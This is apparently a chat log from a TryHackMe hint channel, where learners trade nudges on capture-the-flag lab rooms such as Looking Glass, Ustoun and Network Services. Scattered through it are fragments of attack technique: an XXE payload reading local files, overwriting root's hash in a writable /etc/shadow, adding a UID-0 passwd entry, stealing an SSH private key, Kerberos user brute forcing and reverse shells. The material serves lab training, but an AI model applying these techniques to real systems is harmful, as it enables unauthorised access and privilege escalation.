Is anyone able to nudge me in the right direction for the room "Investigating Windows"?
I've got 2 answers to get but I am completely out of ideas.

hi guys
can i have a hint for looking glass room
i'm in as the user humptydumpty but idk how to escalate more than this
pls don't spoil the room just give me a small hint

Look at permissions, something is out of the ordinary. I can be a little more specific if you'd like.

||What permissions does humptydumpty have?||

||yup i went into alice and there's a .ssh directory but i got nothing ||

Take a guess at something you can read that would be helpful

You should get it in a couple of guesses

Nobody done investigating windows then?

||i read the authorized_keys file but i cant find the private key i also can't write to the authorized_keys||

||i cant find the private key betcha can||

hmmmm

@opal vine ||it's a standard name||

i tried || id_rsa || if that's what you mean

that didn't work? I'm pretty sure that's right

whaaaaaaaaaat

i tried this at the first attempt

well maybe it isn't ||an rsa key, try ecliptic curve and the other ones||

i tried couple of them i'll search for more

i'm fairly sure it's that though... maybe i remember wrong.
make sure you're in the right directory. pwd

with the right user

or the wrong one as the case may be

it is

I made the room and I have the writeup up RN

||id_rsa|| should work

you won't be able to ls it though

oof sad amma terminate the machine
maybe there's something wrong

||drwx--x--x|| is weird... who would ever do that

yep

i spent more than an hour here

so arbitary

James would 😛

though actually i had a drive failure and it fucked up some permissions on my directories and files

it allows you to enter the directory, but not list it

exactly. there is no reason to have such a weird permission

there might be edge cases where it could be useful

oooooooh know i know what happened
since i deployed the machine many time and i got into humpty dumpty from yesterday i knew it's something with alice's directory permissions so once i landed on the machine as jabberwock i went into alice and tried to cat out id_rsa which can't be done and then i switched to the user to humpty and assumed that id_rsa is not valid but if i was the user humpty dumpty it'll work

my bad guys

gj

That last bit, once you're Alice take a look at perms in the directory

If they were really poorly configured, that'd be the case. I didn't want people skipping parts of the box.

ah yuo i figured that out but yup that wwas the right thing to do

how can jabberwock not look into alice but humpty can?

weird

even alice can't read her private key

ah right

Linux permissions are magic

id_rsa is owned by humpty

the private key is owned by humpty for some...

right Xd

yup

that's how

and completely random

well good job on solving it

it's a really nice room @stuck fractal
thanks for the effort you've put into this

also those are some weird usernames :P

have you read Alice in Wonderland?

i watched the movie

they're books to begin with

very different from the movies

too spoopy

yup i might read them after this room

but that's getting off topic

the names aren't that strange 🙂

The second book has a LOT of weird characters

Books are available free as eBooks from project gutenburg, they're public domain works.

anyone ever did the weirdest expoits for hours for privesc and managed to make it work and in the end read that you can just sudo? :P

always check sudo first

I did. and it asked for a password

and i forgot i had the password xD

then it's not sudo

ha or that

but root is root in the end

right?

usually 🙂

Hi guys, can i ask for further hints on room https://tryhackme.com/room/glitch?

Not yet please

oh i see. fresh room

im have some hard time on vulnnet

i m having a hard time in dogcat.Tried a lot of things to triggeer lfi such as php filters,wrappers ,dpath trucation nothning works.A small nudge might help me😊

https://www.tryhackme.com/room/dogcat

Hi Guys,
I was doing Buffer Overflow prep. have tried many times but not being able to get reverse shell from the target. I know it is not the To Do task but I think it should work. Have you ever tried it?

have you tried to see what you can access?

you'll also need to bypass a filter

i checked the writeup .I used the right filter before but i wa string to access /etc/passwd should have tried to read the source instead

Ah yes

i would ask the creator the room ustoun for somthing

@edgy inlet are you doing ustoun ? or you have completed ?

complete it

congrats, i started some minutes ago, seems interesting if someone wants join just to have fun pm me

thanks. yeah but i complete it less then 2 minutes, and when i read the flags i think i used other way.

you root this box in 2 minutes ? o_O

yeah

holy f.. awesome

I would like to ask him about this

Any hints for the AD Usernames in the room USTOUN? Currently stuck at getting a TGT via Impacket 🙂

Check pins

🤔

means no help for that room for now

Oh now I checked the pins, did know these exist ha,

Well you have to be able to laugh about yourself

I've deleted your post as it provides hints for the ustoun room.

i came here to ask for the ustoun room's hints. xD. looks like hints for this room is not be shared yet.

anyone wanna help ,e with tomghost .I want to ask if the room has virtual hosting?

I don't recall it having a vhost

Has anyone done the CTF Collection Vol1?
I'm stuck on task 11. I tried ||exif|| but it says that the png is corrupt. I used ||binwalk|| which revealed that ||the png contained zlib compressed data|| but I can't figure out how to read it. I've done a lot of googling about ||zlib|| but haven't found a solution that works and based on the hint I'm not sure it's the right path.

is there anyone who completed "Password Security" https://tryhackme.com/room/passwordsecurity

I have, do you have a question?

yeah

a question i couldn't find the answer
#task : 2
question: 3
Q: a hash function is a ____function.

@toxic depot

First re-read the fourth paragraph. That should clear it up.

thanks for the help

@toxic depot

👍 anytime!

@toxic depot please don't just post answers

👍

hi, I stock with HackPark https://tryhackme.com/room/hackpark Task 4 3rd question... I think that should be ||WindowsScheduler.exe|| but answer not pass

That's not the correct answer. It's asking for the name of the service, not the name of the process

Try sc query

oh thanks

99% of the time, the room answer is not wrong

Hi ! Anyone here for a hint on Looking Glass challenge ?

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

Ask directly.

the room is "Looking glass" and as far as i am, i'am able to get a weird version of a well-known text and i'm blocked. They ask me for a secret...

Ok. So it's ciphered. Get the full plaintext from that porr, and you'll get your secret

Yes i've already done that but i'm still stuck.. I've seen the added line at the end

Do you have an another hint ?

You need the plaintext from that. The line on the end provides your secret which is what it's asking for.

It's not asking for the key.

It's asking for the secret.

I have tried different ways since hours but so far I can't seem to decipher...

It's a known plaintext attack, the cipher used is super vulnerable for that

ok thanks !

doing the oscp bof room and when i try to overwrite eip with 0xBBBB as the retn i get access violation on 0x414141 instead

So that tells you something that needs to be fixed with your buffer.

indeed, i fixed it a while ago

Ok

any initial hint for ustoun?

No hints or help are provided for new room till 72 hours passes.

Need a hint for Linux Privesc room, task 4 (writeable shadow file). I replace root hash with my own hash in nano, but I get authentication failed when I try to su root with new password

after replacing the hash, I verify the new hash is actually written to the file with cat /etc/shadow, so that part is working

Fixed my mistake, I deleted too much in nano

hey guys, I am having difficulties with the OWASP Juice Shop room. I did it long time ago but did not finish it. Now I am stuck on Task 7 where it says: "In our last task, Proxy, we browsed to the website on our target machine (in this case OWASP Juice Shop)" --> Should the OWASP Juice Shop be installed on the machine I launched for this task already? I only launched the virtual Machine which I should have done in Task 6

Juice shop is running on the target machine in that room

There is the attackbox, and there is the target. They are different, and seperate.

@stuck fractal Thanks. But where in on the Website of Tryhackme can I see the Target Machine? I just launched the "Attacker Machine" it seems - within Task 6 - Proxy. I am not sure where to find the "target Machine" credentials / Login etc. 😮

Click "start machine"

You do not need credentials or login details for the target

The IP for the target will be under Active Machine Information

That is all the information you need

Ahh I see, thanks a lot! 🙂

I was confused. I thought the IP shown there is for an additional Machine or something. But it is the IP of the webserver for the JuiceShop itself! Dang 🙂 Thanks again Ninja

im on the pickle rick ctf and i have found the user and password but cant seem to find any where to use them. just want a little nudge in the right direction. : )

if machine "USTOUN" is not under that 72 hours thing , can anyone give some hints for initial foothold

it is

For another 3hours 44mins or so

nvm i got it

Network Services 2, Task 6: Great, now- select the module and list the options. How do we do this?

The ||info|| command seems to do what it's asking, but the answer is 6 characters long. I have tried looking at the command list for Metasploit to see if I can find a command 6 characters long but I must be overlooking it or somehow overthinking this. Could I get a push in the right direction, please?

Try for 7

Any hint of USTOUN for initial foothold?

Please ask again in 16 minutes

Sure😂

I got it, strange answer since it's not the full command, but I got it. Thanks!

Good job 👍

For linux fundamentals part 1, it doesn't seem to have shiba1 binary on the attack box

You need to SSH into the VM in the room, from the attackbox

Or for part 1

You need to use the machine you deployed in the room with split screen mode. Not the attackbox.

Ok, thanks, got it

ustoun out of hint embargo yet?

have no idea for this machine haha

nvm got in, however from the flag names pretty sure unintended? is the creator about?

Any hint of USTOUN? enumerated all the ports and services. smb, rdp, enuerated users

@everyone

I am at „further nmap“ at „Introduction“. I am struggling with the research question. My research says that the answer is 1023 but tryhackme isn’t accepting this. Please help

Sorry I had to look deeper into the internet and found the answer

I could use a nudge in the OWASP top 10 room, on task 16

Question is "Where is falcon's SSH keys located?"

and I'm supposed to find it using an XXE exploit. So I've been trying different combos and spellings of the following:

<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///home/||falcon||' >]>
<root>&read;</root>

But no luck so far, I'm not sure what I'm doing wrong as this syntax worked for printing the /etc/passwd file

That's a good start

But extend it to the location for SSH keys. The most popular name for the private key.

Doesn't it give you the path in the hint?

there's no hint, but you made me figure it out, thanks man 🙂

knew I was on the right trail

Ah, the room that part was taken from had it in the hint

yeah should have been a hint there imo but oh well 😄

Good day! I am having a "problem" in the "Network Services Room" in Task 4 "Exploiting SMB". I successfully connected to the named SMB-share. I can also see the document which should let me solve the Question "Who can we assume this profile folder belongs to?" but the document is empty when I open it with "more". I researched in the internet and there should be text in it which leads me to the answer. Any ideas?

are you trying to open it directly from the smb client or did you try downloading it locally first?

Oh, good idea. I tried to open it locally within the SMB client... That would explain why EVERY file was empty inside 😄

or did you look at more details when you ls it

I just tried to read it with "more" on the smbclient

I will try to pull the file and read it from Kali then

thanks a lot @ripe hedge

np 🙂

any hints for the foothold on ustoun?

One of the ports that is part of the intended path takes up to 10 minutes to become available. Rerun nmap after say 15 minutes. See if that helps. 🙂

Thank you, will do that

Good morning! I tried to add a new line with new user in the room: Exploiting Writeable /etc/passwd -> https://tryhackme.com/room/commonlinuxprivesc

even following the steps i am not able to login

Screenshots. Show us what you did. Show us what's happening.

are you su the correct account?

Was a good try,it should override the original root?

it looks strange how its new::0

instead of new:password:0:0

yes, in the previous machine i tried with empty password and other UID like new2:*:1008:0

but looks that you need to change /etc/group too

@cold dirge so what you missed, which the room hints at, is escaping the $

$ is a special char in bash usually used ro access the value of variables.

Ok, thank you one more time @stuck fractal !

I'm looking for a hint with glitch. I am working on finding a way to root.txt Do I need to ||horizontally escalate to the other user|| before I can ||use the command with suid set||?

yes

Thank you. Just wanted to make sure 👍

anyone want to hint on USTOUN ? spend so many hours on it but still no foothold

There's one a little way up here

Good day, can anyone give me a tip or hint in room network services task 7 exploiting telnet last 2 questions im listinging on port 4444 and then on target machine I run the payload but dont get anything i must be missing something , thanks again

Screenshot?

Terminate and redeploy the target

You might have broken it earlier with a command that hanged/kept running

thank you sir will do that quickly

worked thanks sir

Hello guys i want to tell you something about some of the CTF challenges when all my thoughts and all the ways i tried are over , go to google and see solutions for challenge is this a useless way to gain experience? Please everyone share your opinion

For tryhackme? Before that, ask for hints.

If you learn from that, why not. You can make use of that knowledge in the next room. However, it could maybe lead to less of a challenge if you use it too much.

@pallid holly Yes i benefit , but i want to solve a challenge on my own . are you know when i solve a challenge on my own i fell indescribable happiness

I know the feeling 😁

Good morning! I'm having trouble figuring out why BurpSuite Sequencer won't capture any tokens for a cookie?

Specificallly Burp Suite - Task 10

I've put the response into repeater and it's coming up as invalid session but im not sure how to rectify even after googling

you can just copy and paste the cookie from your browser to your burp session

i think that if you need to do some requests, postaman also works with the same cookie method

Hey all, I'm struggling with NMAP room, task 8 Q2.

"Why are NULL, FIN and Xmas scans generally used?"

For the life of me, no answer on stealthiness:

"All three are interlinked and are used primarily as they tend to be even stealthier, relatively speaking, than a SYN "stealth" scan."

works...

Any hints? Thoughts?

Thanks for the assist. Ill google them and see what i can do

Check the text above.

Sorry. Above what?

Above the question.

The task text.

Actually read to the end of task 8, and you will find a summary of why these scans are used.

Got it. Thx.

anyone know what the intended way for ustoun is? i feel like i cheated

I'm in room networkservices, working on Task 7: Exploiting Telnet. I've made it all the way to the very last question where I'm now stuck. I've set up the reverse shell payload, and the nc listening port. I see that something happens... but I can't figure out where the supposed file (flag.txt) now can be found?

so did you get a reverse shell?

I do get a message Connection from [...] received! on the nc listener

can you type there?

something like pwd

or whoami

it should create an interactive session with the target system if done correctly

AH!

Thank you

no problem 🙂

I was typing in the target machine rather than at the listener 🤭

mistakes happen 😉

There was a hint about a late opening port, that becomes apparent if you give it 15 minutes after starting. I think I've identified it, and found some options, though my first try was a dead end. Seems to crash a lot for me which doesn't help, don't know if others get that

Im sure it has something to do with what is mentioned in flag 1, although i cant find any vuln's for that.

Encouraging!

i see 2 major problems with this room, the username for the intended path doesn't appear in any wordlists that im aware of, and crackmap wont let you login with those credentials, because it keeps adding something to the start, which blocks login
EDIT need to add --local-auth flag derp

Back to the drawing board for my plan, then!😂😂

hey
can anyone help me with the machine BLUE
like im running the metasploit
but its showing me again and again
handler unable to bind
what should i do?

what port are you trying to bind to?

on the thm machine its 445

and on the vpn thing

like LPORT is 445

but i have tried 4444

too

lport is below 1024 you require root

leave lport at 4444

set LHOST tun0

whats tun0

also msf5 seems more reliable for that room

ohh

thats your vpn adapter

Not any more

msf5 gets it usually first go, msf6 takes a few times, in my experience

might be psychological

I'm in the networkservices2 room, at task 3. I've mounted, found the port, mounted, seen the correct directory name.... but there's not content in that dir (ls doesn't show anything). Could somebody give a hint as to what I'm missing?

ls -lah

thanks!!

Hi, anyone could give me some hint on room Internal pls? I can explain in MP what I already did and where I am stuck. Don't want to spoil here. Thx 😉

in networkservices2, on task 4, I've found the bash file, copied it out. I've set permissions first with +s, though that fails to set it to ending with -Sr-x (as it should according to the instructions). I've added the x with chmod, copied it to the share again and I'm logged in as the other user again. But then it results in ./bash permission denied.

So I've decided to restart all machines, and give the whole task another run. Same result though

the relevant line is

-rwSr-Sr-x 1 root [user] 1113504 [date, time ] bash

I'm not intimately familiar with exactly what you are doing but if its setting suid permission you might need to run +s again or +sx, the suid bit should be lowercase I believe

that did the trick!

nice

maybe that was too big of a hint but I dunno if that was part of the challenge

For room USTOUN, I have enumerated almost everything and still got no foothold. Does this room require brute-forcing ?

IIRC one of the ports takes like 15mins to open

Its been more than 30 mins but still can't find it. I guess I'll scan it again

Yes, please scan the target again. And it does include brute-forcing after username enumeration.

Can anyone help with Ustoun, I have enumerated a number of users, but having no luck brute forcing the password with kerbrute. Would welcome a nudge in the right direction. Thanks

Do not provide or ask for help or hints for the VulnNet: dotpy room until 10th April, 7pm (GMT)

Same :/

Any hints on Ustoun ? I can't find anything, tried || SMB|| but there's nothing I can do

See my previous post in this channel. 🙂

Hi all, hope all is well. I am working on Room: Investigating Windows 3.x. I'm looking in the .arn file for suspicious activity such that I can find the registry key for task 1. I've tried just about each of them, I thought for sure it was the key with entry 30000 but that doesn't seem to be the case. Am I headed down the right path here?

SOLVED - For those looking for help, the .arn file is the place to be.

the username may follow a convention for a service account, although there is no concrete convention for that

best way to find the username you want would be rid brute in crackmapexec

Thanks Pood, did not think of RID, just used a username list with Kerbrute as nothing showed up initially on Enum4linux on RID, will try CME.

For https://tryhackme.com/room/networkservices2, can someone get me a hint how to find 'john hash.txt'?

I googled and stumbled upon a whole walk answer blogpost, and while their answer likely is correct, it's not the route I want to take

...find?

Can you clarify what you mean, please?

Ah, sure. "Now, we need to crack the password! Let's try John the Ripper against it using: "john hash.txt" what is the password of the user we found? "

I have John the Ripper, even started the room already to see if it was shared over there

it's under task 10 of networkservices2

OK, so you ran the command, what happened?

!docs verify

Follow those steps to verify with the bot, then you can send images

I get the message "fopen: john hash.txt: No such file or directory"

Verify with the bot and screenshot please.

(john the ripper at this point is still new and never introduced)

It's a common pentesting tool, you can do research on how to use it. THM rooms are not standalone, they practically always need to be supported by your own research or prior knowledge